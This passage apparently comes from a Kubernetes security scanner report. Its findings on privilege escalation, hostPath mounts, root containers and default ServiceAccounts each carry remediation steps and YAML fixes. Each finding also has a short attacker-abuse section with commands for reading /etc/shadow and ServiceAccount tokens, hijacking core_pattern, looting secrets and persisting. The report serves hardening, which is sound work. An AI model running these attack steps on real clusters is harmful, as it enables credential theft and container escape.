  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/ingress-only/ingress-app Workload 7.8
Container app allows privilege escalation in Deployment/ingress-only/ingress-app
Scope · Workload Workload Deployment/ingress-only/ingress-app
Category: Privilege Escalation Resource: Deployment/ingress-only/ingress-app Namespace: ingress-only

Container app in Deployment/ingress-only/ingress-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n ingress-only -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/rbac-fixtures/imp-app Workload 7.8
Container app allows privilege escalation in Deployment/rbac-fixtures/imp-app
Scope · Workload Workload Deployment/rbac-fixtures/imp-app
Category: Privilege Escalation Resource: Deployment/rbac-fixtures/imp-app Namespace: rbac-fixtures

Container app in Deployment/rbac-fixtures/imp-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n rbac-fixtures -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/rbac-fixtures/wildcard-app Workload 7.8
Container app allows privilege escalation in Deployment/rbac-fixtures/wildcard-app
Scope · Workload Workload Deployment/rbac-fixtures/wildcard-app
Category: Privilege Escalation Resource: Deployment/rbac-fixtures/wildcard-app Namespace: rbac-fixtures

Container app in Deployment/rbac-fixtures/wildcard-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n rbac-fixtures -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/generic-hostpath-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/generic-hostpath-app
Scope · Workload Workload Deployment/vulnerable/generic-hostpath-app
Category: Privilege Escalation Resource: Deployment/vulnerable/generic-hostpath-app Namespace: vulnerable

Container app in Deployment/vulnerable/generic-hostpath-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/host-ns-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/host-ns-app
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Container app in Deployment/vulnerable/host-ns-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/risky-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Container app in Deployment/vulnerable/risky-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/root-runner Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/root-runner
Scope · Workload Workload Deployment/vulnerable/root-runner
Category: Privilege Escalation Resource: Deployment/vulnerable/root-runner Namespace: vulnerable

Container app in Deployment/vulnerable/root-runner either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/vulnerable/socket-mounts-app Workload 7.8
Container app allows privilege escalation in Deployment/vulnerable/socket-mounts-app
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Container app in Deployment/vulnerable/socket-mounts-app either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
HIGH Deployment/local-path-storage/local-path-provisioner Workload 7.8
Container local-path-provisioner allows privilege escalation in Deployment/local-path-storage/local-path-provisioner
Scope · Workload Workload Deployment/local-path-storage/local-path-provisioner
Category: Privilege Escalation Resource: Deployment/local-path-storage/local-path-provisioner Namespace: local-path-storage

Container local-path-provisioner in Deployment/local-path-storage/local-path-provisioner either omits securityContext.allowPrivilegeEscalation or sets it to true. This directly controls the no_new_privs Linux process flag: when allowPrivilegeEscalation: false, the kernel sets NoNewPrivs: 1 on PID 1 in the container, and any subsequent execve() call cannot acquire additional privileges via setuid/setgid binaries, file capabilities, or LSM transitions.

Leaving the field unset is dangerous because the runtime default is true for backward compatibility. If the container image happens to contain a setuid binary (even an inadvertent one from the base image, like mount, ping, su, or vendor agent helpers), an attacker who lands as a non-root user inside the container can re-acquire root just by exec'ing it.

The Pod Security Standards Restricted profile mandates allowPrivilegeEscalation: false precisely because it is the gate that makes capability drops and runAsNonRoot meaningful.

Impact If an attacker lands as a non-root user, they can re-acquire root via setuid binaries; defeats capability drops and runAsNonRoot defenses.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as a non-root user (web RCE in a Node/Python/Java app).
  2. Enumerate setuid binaries: find / -perm -4000 -type f 2>/dev/null (often returns /usr/bin/passwd, /bin/su, /bin/mount, /usr/bin/newuidmap).
  3. Exploit one: su - if password-less, or a known setuid CVE.
  4. Once root in-container, restore previously-dropped capabilities via setcap-style techniques or chain with another finding.
Remediation
Set allowPrivilegeEscalation: false on every container.
  1. Add allowPrivilegeEscalation: false to each container's securityContext. Pair with capabilities.drop: [ALL] and runAsNonRoot: true.
  2. Build/pull images that don't contain setuid binaries; alternatively strip setuid bits in Dockerfile (find / -perm -4000 -exec chmod u-s {} +).
  3. Apply Pod Security Admission restricted to the namespace.
  4. Validate: kubectl get pod -n local-path-storage -l <selector> -o jsonpath='{.items[*].spec.containers[*].securityContext.allowPrivilegeEscalation}' returns false for every container.
Evidence
Container: local-path-provisioner
Show raw JSON
{
  "container": "local-path-provisioner"
}
HIGH

HostPath mount /tmp/data in Deployment/vulnerable/generic-hostpath-app

KUBE-HOSTPATH-001 1 subject Score 7.6
MITRE ATT&CK: T1611 · T1552.001 · T1083

Affected subject

HIGH Deployment/vulnerable/generic-hostpath-app Workload 7.6
HostPath mount /tmp/data in Deployment/vulnerable/generic-hostpath-app
Scope · Workload Workload Deployment/vulnerable/generic-hostpath-app
Category: Privilege Escalation Resource: Deployment/vulnerable/generic-hostpath-app Namespace: vulnerable

Workload Deployment/vulnerable/generic-hostpath-app mounts host path /tmp/data via volume tmp-data. Generic hostPath usage breaks the container abstraction: the pod is now coupled to a specific node's filesystem layout, bypasses CSI quota/encryption/snapshotting, and creates a path-dependent attack surface that varies with the path mounted.

Even "benign" paths can be dangerous. /proc exposes the host's process tree (modify /proc/sys/kernel/core_pattern for root via crash). /sys lets a writable mount enable cgroup-release-agent escapes (CVE-2022-0492). /dev shared with the host gives raw block-device access. /etc/kubernetes contains kubelet config and PKI on control-plane nodes.

Even a read-only mount of /etc leaks /etc/shadow, SSH host keys, kubeadm config, and CNI tokens. Kubernetes Pod Security Standards forbid hostPath volumes at Baseline because there is no safe allowlist.

Impact Variable but always elevated risk: at minimum exposes node-specific files; commonly leaks credentials or enables privilege escalation depending on the path.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Identify the mounted path via mount or cat /proc/mounts from inside the pod.
  2. Enumerate sensitive contents. For /etc: cat /etc/shadow, /etc/kubernetes/admin.conf. For /proc: echo '|/tmp/x' > /proc/sys/kernel/core_pattern then trigger a crash.
  3. If writable, drop a payload, modify a config, or symlink-swap.
  4. Confirm impact with kdigger dig mount or deepce.sh -e.
  5. Persist via the path's owning daemon (cron under /etc, systemd unit under /lib/systemd, etc.).
Remediation
Replace hostPath with a managed alternative (CSI volume, ConfigMap, Secret, projected volume, or local PV).
  1. Determine why hostPath is used: config injection, log scraping, GPU device access. Each has a Kubernetes-native replacement.
  2. If hostPath is unavoidable, narrow path: to the smallest possible directory, set type: to the strictest matching value, and add readOnly: true on the volumeMount.
  3. Pair with runAsNonRoot: true, drop ALL capabilities, and allowPrivilegeEscalation: false.
  4. Enforce via PSA baseline (denies hostPath) or a Kyverno/Gatekeeper allowlist. Validate: kubectl get deployment/generic-hostpath-app -o yaml | grep -A3 hostPath.
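A sketch of the two shapes steps 1 and 2 describe: the preferred replacement when /tmp/data is just scratch space, and the narrowed, read-only hostPath fallback if the host data is genuinely required. The image reference and labels are placeholders.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: generic-hostpath-app
  namespace: vulnerable
spec:
  selector:
    matchLabels:
      app: generic-hostpath-app              # illustrative labels
  template:
    metadata:
      labels:
        app: generic-hostpath-app
    spec:
      containers:
        - name: app
          image: registry.example.com/app@sha256:<digest>   # placeholder image
          volumeMounts:
            - name: tmp-data
              mountPath: /data
              readOnly: true                 # step 2: read-only at the mount
      volumes:
        # Preferred: pod-local scratch space that never touches the node filesystem.
        - name: tmp-data
          emptyDir: {}
        # Fallback if host data is unavoidable: keep the path narrow and assert
        # the expected type so a missing directory fails at pod start instead of
        # being silently created.
        # - name: tmp-data
        #   hostPath:
        #     path: /tmp/data
        #     type: Directory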
Evidence
Volume: tmp-data
Host path: /tmp/data
Generic host path /tmp/data (node-local data exposure; severity depends on what the directory holds)
Show raw JSON
{
  "path": "/tmp/data",
  "volume": "tmp-data"
}
MEDIUM

Container app runs as root (UID 0) in Deployment/vulnerable/root-runner

KUBE-PODSEC-ROOT-001 1 subject Score 6.0
MITRE ATT&CK: T1611 · T1068 · T1548.001

Affected subject

MEDIUM Deployment/vulnerable/root-runner Workload 6.0
Container app runs as root (UID 0) in Deployment/vulnerable/root-runner
Scope · Workload Workload Deployment/vulnerable/root-runner
Category: Privilege Escalation Resource: Deployment/vulnerable/root-runner Namespace: vulnerable

Container app in Deployment/vulnerable/root-runner runs as UID 0, either via an explicit runAsUser: 0, an explicit runAsNonRoot: false, or by relying on the image's default user (which for most public images is root). Container UID 0 is mapped to host UID 0 by default (Linux user namespaces are still off-by-default in Kubernetes), so any kernel exploit, capability misuse, or volume-write vulnerability lands with full root privileges.

Running as root erodes every layer of in-container defense. A read-only root filesystem can be remounted (mount -o remount,rw) if CAP_SYS_ADMIN is held; a kernel CVE that requires root credentials in user-space (the runC "Leaky Vessels" CVE-2024-21626 class, the cgroup-release-agent CVE-2022-0492 class) becomes trivially exploitable; and bind-mounted directories owned by host root become writable.

The Pod Security Standards Restricted profile requires runAsNonRoot: true and forbids setting runAsUser to 0 at both the pod and container level.

Impact All other in-pod hardening (read-only root, capability drops, seccomp) becomes one CVE away from full host compromise; container-CVE exploit reliability rises dramatically.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Gain code execution as root inside the container.
  2. Read all bind-mounted host files writable to root, including ConfigMaps and Secrets.
  3. Attempt a capability-bearing kernel exploit. For example, trigger CVE-2024-21626 (Leaky Vessels) by spawning a child with WORKDIR=/proc/self/fd/8 semantics.
  4. With CAP_SYS_ADMIN remount the root filesystem read-write and modify init scripts.
  5. Persist via dropped binaries in /usr/local/bin whose mounts may survive container restart.
Remediation
Run as a non-root UID (runAsUser: 10001, runAsNonRoot: true) and bake a non-root USER into the image.
  1. In the Dockerfile, add RUN groupadd -g 10001 app && useradd -u 10001 -g app -s /usr/sbin/nologin app and USER 10001. Verify the binary works (file permissions, port binding < 1024 needs NET_BIND_SERVICE).
  2. In the PodSpec, set securityContext.runAsNonRoot: true, runAsUser: 10001, runAsGroup: 10001, fsGroup: 10001.
  3. Pair with allowPrivilegeEscalation: false, capabilities.drop: [ALL], readOnlyRootFilesystem: true, seccompProfile.type: RuntimeDefault.
  4. Validate: kubectl exec <pod> -- id returns uid=10001; kubectl get deployment/root-runner -n vulnerable -o jsonpath='{.spec.template.spec.containers[*].securityContext.runAsUser}' returns 10001.
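A minimal sketch of steps 2 and 3 as a manifest, assuming the image has already been rebuilt with a UID 10001 user per step 1; the image reference and labels are placeholders.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: root-runner
  namespace: vulnerable
spec:
  selector:
    matchLabels:
      app: root-runner                       # illustrative labels
  template:
    metadata:
      labels:
        app: root-runner
    spec:
      securityContext:                       # pod level: also governs volume ownership via fsGroup
        runAsNonRoot: true
        runAsUser: 10001
        runAsGroup: 10001
        fsGroup: 10001
        seccompProfile:
          type: RuntimeDefault
      containers:
        - name: app
          image: registry.example.com/root-runner@sha256:<digest>   # placeholder image
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities:
              drop: ["ALL"]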
Evidence
Container: app
Show raw JSON
{
  "container": "app"
}
MEDIUM

Workload Deployment/flat-network/api runs as the namespace default ServiceAccount

KUBE-SA-DEFAULT-001 9 subjects Score 5.4
MITRE ATT&CK: T1552.001 · T1078 · T1528

Affected subjects (9)

MEDIUM Deployment/flat-network/api Workload 5.4
Workload Deployment/flat-network/api runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/flat-network/api
Category: Privilege Escalation Resource: Deployment/flat-network/api Namespace: flat-network

Workload Deployment/flat-network/api does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n flat-network create sa api-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: api-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n flat-network -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
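The same steps 1–3 in declarative form, assuming (purely for illustration) that the api workload only reads ConfigMaps in its own namespace; swap the Role's rules for whatever the app actually calls.

apiVersion: v1
kind: ServiceAccount
metadata:
  name: api-sa
  namespace: flat-network
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: api-sa-role
  namespace: flat-network
rules:
  - apiGroups: [""]
    resources: ["configmaps"]                # placeholder: grant only what the app needs
    verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
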